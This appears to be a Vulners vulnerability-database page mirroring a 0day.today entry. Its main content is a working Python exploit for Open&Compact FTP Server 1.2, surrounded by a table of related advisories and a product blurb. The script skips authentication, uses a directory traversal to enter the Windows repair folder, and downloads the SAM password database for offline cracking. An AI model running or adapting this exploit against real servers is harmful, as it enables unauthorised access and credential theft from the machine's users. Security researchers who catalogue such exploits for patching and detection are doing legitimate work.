Lucene search
K

Open&Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit

🗓️ 07 Aug 2013 00:00:00Reported by WireghoulType 
zdt
 zdt
🔗 0day.today👁 50 Views

Open&Compact FTP Server 1.2 Auth Bypass & Directory Traversal SAM Retrieval Exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Open-FTPD 1.2 Arbitrary File Upload Vulnerability
13 Aug 201300:00
zdt
CVE
CVE-2010-2620
2 Jul 201020:00
cve
Cvelist
CVE-2010-2620
2 Jul 201020:00
cvelist
NVD
CVE-2010-2620
2 Jul 201020:30
nvd
OpenVAS
Open-FTPD Authentication Bypass Vulnerability
16 Jul 201000:00
openvas
OpenVAS
Open-FTPD Authentication Bypass Vulnerability
16 Jul 201000:00
openvas
Packet Storm
Open And Compact FTP Server 1.2 Bypass / Directory Traversal
8 Aug 201300:00
packetstorm
Packet Storm
Open-FTPD 1.2 Arbitrary File Upload
12 Aug 201300:00
packetstorm
Prion
Authentication flaw
2 Jul 201020:30
prion
#!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory
traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass
(http://1337day.com/exploit/description/12783)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
 
# Abusing authentication bypass in combination with a directory traversal
to grab
# the sam file for offline cracking
import ftplib
import os
 
# Connect to server
ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )
 
# Note that we need no authentication at all!!
 
print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )
 
ftp.quit()

#  0day.today [2018-02-18]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation